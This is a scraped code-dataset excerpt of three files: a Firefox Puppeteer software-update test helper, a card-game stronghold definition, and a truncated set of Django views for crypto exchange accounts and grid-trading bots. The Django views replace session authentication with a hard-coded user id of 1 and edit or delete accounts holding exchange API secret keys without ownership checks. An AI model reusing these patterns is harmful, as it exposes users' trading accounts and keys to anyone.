\"\"\" Holds a reference to an :class:`ActiveUpdate` object.\"\"\"\n return self._active_update\n\n @property\n def allowed(self):\n \"\"\"Check if the user has permissions to run the software update\n\n :returns: Status if the user has the permissions\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let aus = Components.classes['@mozilla.org/updates/update-service;1']\n .getService(Components.interfaces.nsIApplicationUpdateService);\n return aus.canCheckForUpdates && aus.canApplyUpdates;\n \"\"\")\n\n @property\n def build_info(self):\n \"\"\"Return information of the current build version\n\n :returns: A dictionary of build information\n \"\"\"\n return {\n 'buildid': self.app_info.appBuildID,\n 
'channel': self.update_channel.channel,\n 'disabled_addons': self.prefs.get_pref(self.PREF_DISABLED_ADDONS),\n 'locale': self.app_info.locale,\n 'mar_channels': self.mar_channels.channels,\n 'url_aus': self.get_update_url(True),\n 'user_agent': self.app_info.user_agent,\n 'version': self.app_info.version\n }\n\n @property\n def is_complete_update(self):\n \"\"\"Return true if the offered update is a complete update\n\n :returns: True if the offered update is a complete update\n \"\"\"\n # Throw when isCompleteUpdate is called without an update. This should\n # never happen except if the test is incorrectly written.\n assert self.active_update.exists, 'An active update has been found'\n\n patch_count = self.active_update.patch_count\n assert patch_count == 1 or patch_count == 2,\\\n 'An update must have one or two patches included'\n\n # Ensure Partial and Complete patches produced have unique urls\n if patch_count == 2:\n patch0_url = self.active_update.get_patch_at(0)['URL']\n patch1_url = self.active_update.get_patch_at(1)['URL']\n assert patch0_url != patch1_url,\\\n 'Partial and Complete download URLs are different'\n\n return self.active_update.selected_patch['type'] == 'complete'\n\n @property\n def mar_channels(self):\n \"\"\" Holds a reference to a :class:`MARChannels` object.\"\"\"\n return self._mar_channels\n\n @property\n def os_version(self):\n \"\"\"Returns information about the OS version\n\n :returns: The OS version\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/Services.jsm\");\n\n let osVersion;\n try {\n osVersion = Services.sysinfo.getProperty(\"name\") + \" \" +\n Services.sysinfo.getProperty(\"version\");\n }\n catch (ex) {\n }\n\n if (osVersion) {\n try {\n osVersion += \" (\" + Services.sysinfo.getProperty(\"secondaryLibrary\") + \")\";\n }\n catch (e) {\n // Not all platforms have a secondary widget library,\n // so an error is nothing to worry about.\n }\n osVersion = encodeURIComponent(osVersion);\n }\n return osVersion;\n \"\"\")\n\n @property\n def patch_info(self):\n \"\"\" Returns information of the active update in the queue.\"\"\"\n info = {'channel': self.update_channel.channel}\n\n if (self.active_update.exists):\n info['buildid'] = self.active_update.buildID\n info['is_complete'] = self.is_complete_update\n info['size'] = self.active_update.selected_patch['size']\n info['type'] = self.update_type\n info['url_mirror'] = \\\n self.active_update.selected_patch['finalURL'] or 'n/a'\n info['version'] = self.active_update.appVersion\n\n return info\n\n @property\n def staging_directory(self):\n \"\"\" Returns the path to the updates staging directory.\"\"\"\n return self.marionette.execute_script(\"\"\"\n let aus = Components.classes['@mozilla.org/updates/update-service;1']\n .getService(Components.interfaces.nsIApplicationUpdateService);\n return aus.getUpdatesDirectory().path;\n \"\"\")\n\n @property\n def update_channel(self):\n \"\"\" Holds a reference to an :class:`UpdateChannel` object.\"\"\"\n return self._update_channel\n\n @property\n def update_type(self):\n \"\"\"Returns the type of the active update.\"\"\"\n return self.active_update.type\n\n def force_fallback(self):\n \"\"\"Update the update.status file and set the status to 'failed:6'\"\"\"\n with open(os.path.join(self.staging_directory, 'update.status'), 'w') as f:\n f.write('failed: 6\\n')\n\n def get_update_url(self, force=False):\n \"\"\"Retrieve the AUS update URL the update snippet is retrieved from\n\n :param force: Boolean flag 
to force an update check\n\n :returns: The URL of the update snippet\n \"\"\"\n url = self.prefs.get_pref(self.PREF_APP_UPDATE_URL_OVERRIDE)\n\n if not url:\n url = self.prefs.get_pref(self.PREF_APP_UPDATE_URL)\n\n # get the next two prefs from the default branch\n dist = self.prefs.get_pref(self.PREF_APP_DISTRIBUTION, True) or 'default'\n dist_version = self.prefs.get_pref(self.PREF_APP_DISTRIBUTION_VERSION,\n True) or 'default'\n\n # Not all placeholders are getting replaced correctly by formatURL\n url = url.replace('%PRODUCT%', self.app_info.name)\n url = url.replace('%BUILD_ID%', self.app_info.appBuildID)\n url = url.replace('%BUILD_TARGET%', self.app_info.OS + '_' + self.ABI)\n url = url.replace('%OS_VERSION%', self.os_version)\n url = url.replace('%CHANNEL%', self.update_channel.channel)\n url = url.replace('%DISTRIBUTION%', dist)\n url = url.replace('%DISTRIBUTION_VERSION%', dist_version)\n\n url = self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/Services.jsm\");\n return Services.urlFormatter.formatURL(arguments[0]);\n \"\"\", script_args=[url])\n\n if force:\n if '?' in url:\n url += '&'\n else:\n url += '?'\n url += 'force=1'\n\n return url\n\n\nclass UpdateChannel(BaseLib):\n \"\"\"Class to handle the update channel as listed in channel-prefs.js\"\"\"\n REGEX_UPDATE_CHANNEL = re.compile(r'(\"app\\.update\\.channel\", \")([^\"].*)(?=\")')\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self.prefs = Preferences(marionette_getter)\n\n self.file_path = self.marionette.execute_script(\"\"\"\n Components.utils.import('resource://gre/modules/Services.jsm');\n\n let file = Services.dirsvc.get('PrfDef', Components.interfaces.nsIFile);\n file.append('channel-prefs.js');\n\n return file.path;\n \"\"\")\n\n @property\n def file_contents(self):\n \"\"\"The contents of the channel-prefs.js file.\"\"\"\n with open(self.file_path) as f:\n return f.read()\n\n @property\n def channel(self):\n \"\"\"The name of the update channel as stored in the\n app.update.channel pref.\"\"\"\n return self.prefs.get_pref('app.update.channel', True)\n\n @property\n def default_channel(self):\n \"\"\"Get the default update channel\n\n :returns: Current default update channel\n \"\"\"\n matches = re.search(self.REGEX_UPDATE_CHANNEL, self.file_contents).groups()\n assert len(matches) == 2, 'Update channel value has been found'\n\n return matches[1]\n\n @default_channel.setter\n def default_channel(self, channel):\n \"\"\"Set default update channel.\n\n :param channel: New default update channel\n \"\"\"\n assert channel, 'Update channel has been specified'\n new_content = re.sub(\n self.REGEX_UPDATE_CHANNEL, r'\\g<1>' + channel, self.file_contents)\n with open(self.file_path, 'w') as f:\n f.write(new_content)\n","repo_name":"classilla/tenfourfox","sub_path":"testing/puppeteer/firefox/firefox_puppeteer/api/software_update.py","file_name":"software_update.py","file_ext":"py","file_size_in_byte":15455,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"37"} +{"seq_id":"34020812863","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING\n\nfrom l5r_auto.abilities import Ability\nfrom l5r_auto.cards.followers.common import Follower\nfrom l5r_auto.cards.personalities.common import PersonalityEntity\nfrom l5r_auto.cards.strongholds.common import Stronghold\nfrom l5r_auto.clans import UnicornClan\nfrom l5r_auto.keywords import 
Cavalry\nfrom l5r_auto.legality import DiamondEdition, GoldEdition, JadeEdition\nfrom l5r_auto.utils import is_entity_of_type\n\nif TYPE_CHECKING:\n from l5r_auto.cards import Entity\n from l5r_auto.play import Game\n from l5r_auto.player import Player\n\n# Northern Provinces of the Moto\n\n\n@dataclass(repr=False, kw_only=True)\nclass ProduceGoldForCavalry(Ability):\n \"\"\"w: When paying for a Cavalry Follower, produce 7 Gold that may only pay for it.\"\"\"\n\n base_gold_amount: int\n gold_amount: int\n\n def on_pay(self, game: Game, player: Player, entity: Entity) -> int:\n if is_entity_of_type(entity, Follower) and Cavalry in entity.keywords:\n return self.gold_amount\n else:\n return self.base_gold_amount\n\n\n@dataclass(repr=False, kw_only=True)\nclass NorthernProvincesBattleAbility(Ability):\n \"\"\"Repeatable Tireless Battle: Target your two unbowed Cavalry Personalities that this action has not targeted this turn, one of whom may be at any location. Switch their locations.\"\"\"\n\n repeatable: bool = True\n tireless: bool = True\n battle: bool = True\n\n targeted_this_turn: list[PersonalityEntity] = field(\n default_factory=list, init=False\n )\n\n def gather_legal_target_entities(\n self, game: Game, active_player: Player\n ) -> list[PersonalityEntity]:\n return [\n x\n for x in active_player.play_area\n if is_entity_of_type(x, PersonalityEntity)\n and Cavalry in x.keywords\n and not x.bowed\n and x not in self.targeted_this_turn\n ]\n\n def get_effect(\n self,\n game: Game,\n active_player: Player,\n targets: tuple[PersonalityEntity, PersonalityEntity],\n ):\n one_cavalry, two_cavalry = targets\n one_location = one_cavalry.location\n two_location = two_cavalry.location\n one_cavalry.move_to(two_location)\n two_cavalry.move_to(one_location)\n\n def pay_cost(self, game: Game, entity: PersonalityEntity) -> bool:\n return True\n\n\nNorthernProvincesOfTheMoto = Stronghold(\n card_id=5625,\n title=\"Northern Provinces of the Moto\",\n province_strength=7,\n gold_production=\"5\",\n starting_family_honor=4,\n clan=[UnicornClan],\n abilities=[\n ProduceGoldForCavalry(base_gold_amount=5, gold_amount=7),\n NorthernProvincesBattleAbility(),\n ],\n legality=[DiamondEdition, JadeEdition, GoldEdition],\n)\n","repo_name":"aubustou/l5r","sub_path":"l5r_auto/cards/strongholds/unicorn/soul_of_the_empire.py","file_name":"soul_of_the_empire.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35859449478","text":"import threading\nimport time\nimport math\nimport re\nimport json\n\nfrom urllib import parse\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom .models import Account, Property, LastdayAssets, Market, Robot, TradingPlatform, OrderInfo\nfrom .forms import AccountModelForm, RobotFrom, EditAccountFrom\nfrom apps.rbac.models import UserInfo\nfrom django.core.paginator import Paginator\nfrom apps.deal.asset.get_assets import GetAssets\nfrom dealapi.exx.exxMarket import MarketCondition\nfrom dealapi.exx.exxService import ExxService\nfrom apps.deal.Strategy.Grid import GridStrategy\nfrom django.contrib.sessions.models import Session\n\nfrom django.core.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework import serializers\nfrom utils import restful\nfrom utils.mixin import LoginRequireMixin\nfrom rest_framework import generics\nfrom django.core.serializers import serialize\nfrom 
apps.deal.serializers import AccountSerializer, RobotSerializer, OrderInfoSerializer, LastdayAssetsSerializer, PropertySerializer, PlatformSerializer\nfrom apps.rbac.serializers import UserSerializer\n\n# Create your views here.\n\n\n# class AccountList(LoginRequireMixin, generics.CreateAPIView):\nclass AccountList(generics.CreateAPIView):\n \"\"\"\n 显示用户所有账户信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n pageNum = request.GET.get('pageIndex', 1)\n pagesize = request.GET.get('pageSize')\n # 获取用户id\n try:\n sessionid = request.META.get(\"HTTP_SESSIONID\")\n session_data = Session.objects.get(session_key=sessionid)\n user_id = session_data.get_decoded().get('user_id')\n except Exception as e:\n print(e)\n # user_id = 1\n if not user_id:\n return restful.params_error(message='账户失效,请重新登陆!')\n # 获取账户信息\n accounts = Account.objects.filter(users__id=user_id)\n # 分页\n try:\n paginator = Paginator(Account.objects.filter(users__id=user_id), 3)\n page_obj = paginator.page(int(pageNum))\n except:\n return restful.params_error(message='页码错误')\n # 获取勾选币种\n currency_list = Property.objects.filter(currency_status='1').values(\"currency\",).distinct()\n ret = list(currency_list)\n data = json.dumps(ret)\n # data = PropertySerializer(currency_list, fields=('currency',), many=True).data\n print(data)\n numPerPage = len(page_obj.object_list)\n totalCount = accounts.count()\n totalPageNum = paginator.num_pages\n\n context = {\n 'numPerPage': numPerPage,\n 'PageNum': int(pageNum),\n 'result': AccountSerializer(page_obj.object_list, many=True).data,\n # 'result': AccountSerializer(page_obj.object_list, fields=('id', 'title'), many=True).data,\n 'totalCount': totalCount,\n 'totalPageNum': totalPageNum,\n 'currency_list': data,\n }\n # print(context)\n return restful.result(data=context)\n\n\nclass GetCurrencies(generics.CreateAPIView):\n \"\"\"\n 获取用户所有币种\n \"\"\"\n def get(self, request):\n # 获取用户所有币种\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n if user_id:\n currency_list = Property.objects.filter(account__users__id=user_id).values(\"currency\",).distinct()\n ret = list(currency_list)\n # currency_list = serialize('json', currency_list)\n data = json.dumps(ret)\n return restful.result(data=data)\n else:\n return restful.params_error(message='未获取到账户登陆信息,请检查是否登陆')\n\n\nclass AddAccount(generics.CreateAPIView):\n \"\"\"\n 添加账户\n \"\"\"\n # queryset = Account.objects.get_queryset().order_by('id')\n serializer_class = AccountSerializer\n\n def get(self, request):\n platform = TradingPlatform.objects.all()\n data = PlatformSerializer(platform, many=True).data\n return restful.result(message=data)\n\n def post(self, request):\n model_form = AccountModelForm(request.POST)\n if model_form.is_valid():\n # save()返回一个还未保存至数据库的对象,用这个对象添加一些额外的数据,然后在用save()保存到数据库\n obj = model_form.save(commit=False)\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n user_obj = UserInfo.objects.get(id=user_id)\n # 添加数据需为模型类对象\n obj.users = user_obj\n obj.save()\n accounts = Account.objects.filter(Q(title=obj) & Q(platform=model_form.cleaned_data['platform']))\n currency = Property.objects.values(\"currency\").distinct()\n\n print(accounts, currency)\n # 给新账户添加币种\n for account in accounts:\n for cur in currency:\n 
LastdayAssets.objects.create(currency=cur['currency'], account=account)\n Property.objects.create(currency=cur['currency'], account=account, currency_status=0)\n return restful.ok()\n else:\n return restful.params_error(model_form.get_errors())\n\n\ndef accountinfo(request):\n accout_id = request.POST.get('id')\n account = Account.objects.get(id=accout_id)\n serialize = AccountSerializer(account)\n print(serialize.data)\n return restful.result(data=serialize.data)\n\n\nclass EditAccount(generics.ListCreateAPIView):\n \"\"\"\n get:\n 获取要修改账户信息.\n post:\n 提交修改信息.\n \"\"\"\n serializer_class = AccountSerializer\n\n def get(self, request):\n account_id = request.GET.get('account_id')\n if account_id:\n account = Account.objects.get(id=account_id)\n account = AccountSerializer(account)\n return restful.result(data=account.data)\n else:\n return restful.params_error(message='参数为空')\n\n def post(self, request):\n form = EditAccountFrom(request.POST)\n if form.is_valid():\n title = form.cleaned_data.get('title')\n accesskey = form.cleaned_data.get('accesskey')\n secretkey = form.cleaned_data.get('secretkey')\n platform = form.cleaned_data.get('platform')\n pk = form.cleaned_data.get('id')\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n print(title, accesskey, secretkey, platform, pk, user_id)\n Account.objects.filter(pk=pk).update(title=title, accesskey=accesskey, secretkey=secretkey,\n platform=platform, users=user_id)\n return restful.ok()\n else:\n return restful.params_error(form.get_errors())\n\n\nclass DeleteAccount(generics.CreateAPIView):\n \"\"\"\n 删除账户\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n pk = request.POST.get('id')\n try:\n Account.objects.filter(id=pk).delete()\n return restful.ok()\n except:\n return restful.params_error(message=\"该账户不存在\")\n\n\nclass ShowAssert(generics.CreateAPIView):\n \"\"\"\n 显示账户资产信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n if id:\n # 获取账户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 创建对象\n print(id, platform)\n con = GetAssets(id, account_obj, platform)\n data = con.showassets()\n return restful.result(data=data)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ShowCollectAsset(generics.CreateAPIView):\n \"\"\"\n 汇总资产信息\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n currency_data = json.loads(data) # 反序列化\n account_list = currency_data.get('id')\n if account_list:\n accounts = account_list\n else:\n return restful.result(data='')\n # user_id = request.session.get(\"user_id\")\n # user_id = 1\n # account_lists = Account.objects.filter(users=user_id)\n # for account in account_lists:\n # accounts = list()\n # accounts.append(account.id)\n\n flag = True\n context_list = list()\n for id in accounts:\n print(\"*\" * 20, id)\n # 获取账户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 创建对象\n con = GetAssets(id, account_obj, platform, flag)\n context = con.showassets()\n context_list.append(context)\n print('******', context_list)\n # 汇总资产表数据\n for key in context_list[0]['assets_dict']:\n for elem in context_list[1:]:\n for key1, value1 in elem['assets_dict'][key].items():\n if key1 is 'last':\n continue\n elif key1 in 
context_list[0]['assets_dict'][key]:\n context_list[0]['assets_dict'][key][key1] = \\\n float(context_list[0]['assets_dict'][key][key1]) + float(value1)\n else:\n context_list[0]['assets_dict'][key][key1] = value1\n # 损益表汇总数据\n for key in context_list[0]['profit_loss_dict']:\n for elem in context_list[1:]:\n for key1, value1 in elem['profit_loss_dict'][key].items():\n if key1 is 'last':\n continue\n elif key1 in context_list[0]['profit_loss_dict'][key]:\n context_list[0]['profit_loss_dict'][key][key1] = \\\n float(context_list[0]['profit_loss_dict'][key][key1]) + float(value1)\n else:\n context_list[0]['profit_loss_dict'][key][key1] = value1\n # 汇总资产变化/初始总资产/历史盈亏/\n print('资产汇总', '-' * 20)\n print(context_list[0])\n return restful.result(data=context_list[0])\n\n\nclass ChargeAccount(generics.CreateAPIView):\n \"\"\"\n 增资\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n currency = request.POST.get('currency')\n num = request.POST.get('num')\n print(id, currency, num)\n if id and currency and num:\n account_obj = Account.objects.get(id=id) # 获取账户信息\n platform = account_obj.platform # 账户对应的平台\n # 根据平台调用对应接口\n try:\n if str(platform) == 'EXX':\n currency_pair = currency.lower() + '_usdt'\n market_api = MarketCondition(currency_pair)\n info = market_api.get_ticker() # 获取EXX单个交易对行情信息\n info = info['ticker']['last']\n elif str(platform) == 'HUOBI':\n pass\n except:\n print('未获取到该币种当前价')\n info = 1\n try:\n property_obj = Property.objects.get(Q(account_id=id) & Q(currency=currency))\n original_assets = float(property_obj.original_assets) + float(num) * float(info)\n print('/-'*10, original_assets)\n Property.objects.filter(Q(account_id=id) & Q(currency=currency)).update(original_assets=original_assets)\n return restful.ok()\n except:\n return restful.params_error(message='账户没有此币种')\n else:\n return restful.params_error(message='参数为空')\n\n\nclass WithDraw(generics.CreateAPIView):\n \"\"\"\n 提币\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n id = request.POST.get('id')\n currency = request.POST.get('currency')\n num = request.POST.get('num')\n if id and currency and num:\n account_obj = Account.objects.get(id=id) # 获取账户信息\n platform = account_obj.platform # 账户对应的平台\n # 根据平台调用对应接口\n try:\n if str(platform) == 'EXX':\n currency_pair = currency.lower() + '_usdt'\n market_api = MarketCondition(currency_pair)\n info = market_api.get_ticker() # 获取EXX单个交易对行情信息\n last = info['ticker']['last']\n elif str(platform) == 'HUOBI':\n pass\n except:\n print('未获取到该币种当前价')\n last = 1\n if currency:\n # 提币折合成usdt\n property_obj = Property.objects.get(Q(account_id=id) & Q(currency=currency))\n withdraw_record = float(property_obj.withdraw_record) + float(num) * float(last)\n Property.objects.filter(Q(account_id=id) & Q(currency=currency)).update(withdraw_record=withdraw_record)\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\nclass ConfigCurrency(generics.CreateAPIView):\n \"\"\"\n 币种新增/配置\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n currency = request.POST.get('currency')\n currency_list = list()\n currency_list.append(currency)\n if currency_list:\n # sessionid = request.META.get(\"HTTP_SESSIONID\")\n # session_data = Session.objects.get(session_key=sessionid)\n # user_id = session_data.get_decoded().get('user_id')\n user_id = 1\n accounts = Account.objects.filter(users=user_id)\n for account in accounts:\n for currency in currency_list:\n if currency:\n # 
账户存在此币种则不添加\n property_obj = Property.objects.filter(Q(account=account.id) & Q(currency=currency))\n print('+' * 30, list(property_obj))\n if not list(property_obj):\n # 保存币种信息\n LastdayAssets.objects.create(currency=currency, account=account)\n Property.objects.create(currency=currency, account=account, currency_status=0)\n else:\n return restful.params_error(message='请选择账户币种')\n # 返回数据为json格式\n data = Property.objects.values(\"currency\").distinct()\n return restful.result(data=list(data))\n else:\n return restful.params_error(message='请选择账户币种')\n\n\nclass SelectCurrency(generics.CreateAPIView):\n \"\"\"\n 勾选的币种\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n print(data)\n currency_data = json.loads(data)\n currency_list = currency_data.get('currency')\n if currency_list:\n Property.objects.values(\"currency\").update(currency_status='0')\n LastdayAssets.objects.values(\"currency\").update(currency_status='0')\n for cur in list(currency_list):\n Property.objects.filter(currency=cur).update(currency_status='1')\n LastdayAssets.objects.filter(currency=cur).update(currency_status='1')\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# 创建机器人\nclass CreateRobot(generics.CreateAPIView):\n \"\"\"\n 获取配置策略的参数\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n try:\n robot_data = request.body.decode(\"utf-8\")\n currency_data = json.loads(robot_data)\n id = currency_data.get('trading_account')\n account_obj = Account.objects.get(id=id)\n del currency_data['trading_account']\n # Robot.objects.filter(id=5).update(**currency_data)\n Robot.objects.create(**currency_data, trading_account=account_obj)\n return restful.ok()\n except Exception as e:\n print(e)\n\n\ndef get_account_info(currency, market, id):\n \"\"\"\n 获取用户信息\n :param currency: 交易币种\n :param market: 交易市场\n :param id: 机器人id\n :return:\n \"\"\"\n # 获取账户所属的用户信息\n account_obj = Account.objects.get(id=id)\n # 账户对应的平台\n platform = account_obj.platform\n # 获取用户信息\n user_obj = UserInfo.objects.all()\n if str(platform) == 'EXX':\n # 创建交易接口对象---------------------------------------------------------------------API\n service_obj = ExxService(account_obj.secretkey, account_obj.accesskey)\n # 创建行情接口对象\n currency_pair = currency.lower() + '_' + market.lower()\n market_obj = MarketCondition(currency_pair)\n\n elif str(platform) == 'HUOBI':\n pass\n\n return user_obj, service_obj, market_obj\n\n\nclass SearchRobot(generics.CreateAPIView):\n \"\"\"\n 机器人搜索\n \"\"\"\n def post(self, request):\n search = request.body.decode(\"utf-8\")\n search_data = json.loads(search)\n t_currency = search_data.get('t_currency')\n t_market = search_data.get('t_market')\n t_status = search_data.get('t_status')\n search_dict = dict()\n if t_currency:\n search_dict['currency'] = t_currency\n if t_market:\n search_dict['market'] = t_market\n if t_status:\n search_dict['status'] = t_status\n\n t_data = Robot.objects.filter(**search_dict)\n # 序列化\n return restful.result(RobotSerializer(t_data, many=True).data)\n\n\nclass GetAccountInfo(generics.CreateAPIView):\n \"\"\"\n 展示交易对可用额度/当前价,计算默认值\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def post(self, request):\n data = request.body.decode('utf-8')\n tdata = json.loads(data)\n currency = 
tdata.get('curry_title')\n market = tdata.get('market_title')\n # 获取账户id\n id = tdata.get('account_id')\n\n if currency and market and id:\n # 调用get_account_info函数\n user_obj, service_obj, market_obj = get_account_info(currency, market, id)\n try:\n info = service_obj.get_balance()\n info = info['funds']\n info1 = market_obj.get_ticker()\n info1 = info1['ticker']\n info2 = market_obj.get_klines('1day', '30')\n info2 = info2.get('datas')\n except Exception as e:\n print(e)\n return restful.params_error(message='币种错误或者调用接口失败,请核对!')\n # 计算阻力位/支撑位的默认值\n if int(info2.get('limit', 0)) <= 30:\n max = 0\n min = 0\n for i in info2['data']:\n max += float(i[2])\n min += float(i[3])\n context = {\n # 账户起始交易币种总资产\n 'total_currency': self.data_format(info[currency.upper()].get('total')) + ' ' + currency,\n # 账户起始交易市场币种总资产\n 'total_market': self.data_format(info[market.upper()].get('total')) + ' ' + market,\n # 交易币种可用\n 'currency': self.data_format(info[currency.upper()].get('balance')) + ' ' + currency,\n # 交易市场可用\n 'market': self.data_format(info[market.upper()].get('balance')) + ' ' + market,\n # 当前价\n 'last': self.data_format(info1.get('last')) + ' ' + market,\n # 阻力位\n 'resistance': round(float(max / int(info2['limit'])), 2),\n # 支撑位\n 'support_level': round(float(min / int(info2['limit'])), 2),\n\n }\n print(context)\n return restful.result(data=context)\n else:\n return restful.params_error(message='参数为空')\n\n\nclass RobotProtection(generics.CreateAPIView):\n \"\"\"\n 机器人保护\n \"\"\"\n serializer_class = AccountSerializer\n\n def post(self, request):\n data = request.body.decode('utf-8')\n data_dict = json.loads(data)\n id = data_dict.get('robot_id')\n flag = data_dict.get('flag')\n protect = data_dict.get('protect')\n if id and flag and protect:\n Robot.objects.filter(id=id).update(status=flag)\n Robot.objects.filter(id=id).update(protection=protect)\n\n return restful.ok()\n else:\n return restful.params_error(message='参数为空')\n\n\nclass StartRobot(generics.CreateAPIView):\n \"\"\"\n 管理机器人\n \"\"\"\n serializer_class = AccountSerializer\n order_list = \"\"\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n # 多个和一个\n ids = data_dict.get('robot_id')\n # Flag为1启动,为0停止\n Flag = data_dict.get('flag')\n if Flag is None:\n return restful.params_error(message='参数flag为空')\n if ids:\n robots = Robot.objects.filter(id=ids)\n elif Flag == 1:\n robots = Robot.objects.filter(Q(status=0) & Q(protection=1))\n elif Flag == 0:\n robots = Robot.objects.filter(Q(status=1) & Q(protection=1))\n\n Flag = int(Flag)\n # 调用对应策略\n for robot_obj in robots:\n if robot_obj.trading_strategy == '网格交易V1.0' and Flag == 1:\n Robot.objects.filter(id=robot_obj.id).update(run_status=0, status=Flag)\n # Robot.objects.filter(id=robot_obj.id).update(status=Flag)\n # 启动线程\n thread1 = GridStrategy(robot_obj=robot_obj, order_type=\"buy\")\n thread2 = GridStrategy(robot_obj=robot_obj, order_type=\"sell\")\n thread1.start()\n thread2.start()\n print('-' * 30, '启动线程')\n elif robot_obj.trading_strategy == '网格交易V1.0' and Flag == 0:\n Robot.objects.filter(id=robot_obj.id).update(run_status=1, status=Flag)\n # Robot.objects.filter(id=robot_obj.id).update(run_status=1)\n # 停止线程\n for item in threading.enumerate():\n try:\n # 获取线程对应的机器人\n robot = item.robot_obj\n if robot_obj.id == robot.id:\n item.setFlag(False)\n rtime = time.time() - item.start_time\n Robot.objects.filter(id=robot_obj.id).update(running_time=rtime)\n except:\n print('对象没有属性robot_obj')\n continue\n\n elif robot_obj.trading_strategy == 
'三角套利V1.0':\n pass\n elif robot_obj.trading_strategy == '搬砖套利V1.0':\n pass\n\n StartRobot.order_list = threading.enumerate()\n return restful.ok()\n\n\nclass ShowTradeDetail(generics.CreateAPIView):\n \"\"\"\n 展示机器人交易详情\n \"\"\"\n serializer_class = AccountSerializer\n\n def data_format(self, data):\n data = str(round(float(data), 2))\n return data\n\n def changeTime(self, allTime):\n day = 24 * 60 * 60\n hour = 60 * 60\n min = 60\n if allTime < 60:\n return \"%d 秒\" % math.ceil(allTime)\n elif allTime > day:\n days = divmod(allTime, day)\n return \"%d 天, %s\" % (int(days[0]), self.changeTime(days[1]))\n elif allTime > hour:\n hours = divmod(allTime, hour)\n return '%d 时, %s' % (int(hours[0]), self.changeTime(hours[1]))\n else:\n mins = divmod(allTime, min)\n return \"%d 分, %d 秒\" % (int(mins[0]), math.ceil(mins[1]))\n\n def sort_data(self, order_info):\n sells = dict()\n buys = dict()\n for k, v in order_info.items():\n if v[\"order_type\"] == \"sell\":\n sells[k] = v\n elif v[\"order_type\"] == \"buy\":\n buys[k] = v\n buys = sorted(buys.items(), key=lambda x: x[1][\"price\"], reverse=True)\n sells = sorted(sells.items(), key=lambda x: x[1][\"price\"])\n return dict(sells), dict(buys)\n\n def post(self, request):\n data = request.body.decode(\"utf-8\")\n data_dict = json.loads(data)\n # 获取机器人id\n id = data_dict.get('robot_id')\n if id:\n robot_obj = Robot.objects.get(id=id)\n currency = robot_obj.currency\n market = robot_obj.market\n # 调用函数\n try:\n user_obj, service_obj, market_obj = get_account_info(currency, market, robot_obj.trading_account_id)\n info = service_obj.get_balance()\n # print(\"交易详情\"+info)\n info = info.get('funds')\n info1 = market_obj.get_ticker()\n info1 = info1.get('ticker')\n except Exception as e:\n return restful.params_error(message='币种错误,请核对!')\n property_obj = Property.objects.get(Q(account_id=robot_obj.trading_account) & Q(currency=currency))\n closed_order = OrderInfo.objects.filter(robot=id).order_by(\"-id\")\n serialize = OrderInfoSerializer(closed_order, many=True)\n\n # 获取挂单信息\n order_info = dict()\n running_time = 0\n for item in StartRobot.order_list:\n try:\n # 获取机器人对应的线程对象\n robot = item.robot_obj\n if id == str(robot.id):\n # 向字典中添加数据\n order_info = {**order_info, **item.id_dict}\n running_time = time.time() - item.start_time\n except:\n print('对象没有属性robot_obj')\n continue\n sell, buy = self.sort_data(order_info)\n\n context = {\n # 交易币种和交易市场\n 'currency_market': {\"currency\": currency, \"market\": market},\n # 已完成笔数\n 'closed_num': len(closed_order),\n # 已完成挂单信息\n 'closed_info': serialize.data,\n # 未完成笔数\n 'open_num': len(order_info),\n # 未完成卖单信息\n 'SELL': sell,\n # 未完成买单信息\n 'BUY': buy,\n # 总投入\n 'total_input': self.data_format(property_obj.original_assets),\n # 运行时间\n 'running_time': self.changeTime(running_time),\n # 交易币种可用\n 'currency_balance': self.data_format(info[currency.upper()].get('balance')) + ' ' + currency,\n # 交易市场可用\n 'market_balance': self.data_format(info[market.upper()].get('balance')) + ' ' + market,\n # 交易币种冻结\n 'currency_freeze': self.data_format(info[currency.upper()].get('freeze')) + ' ' + currency,\n # 交易市场冻结\n 'market_freeze': self.data_format(info[market.upper()].get('freeze')) + ' ' + market,\n # 当前价\n 'last': self.data_format(info1.get('last')) + ' ' + market,\n # 总收益\n 'profit': self.data_format(\n 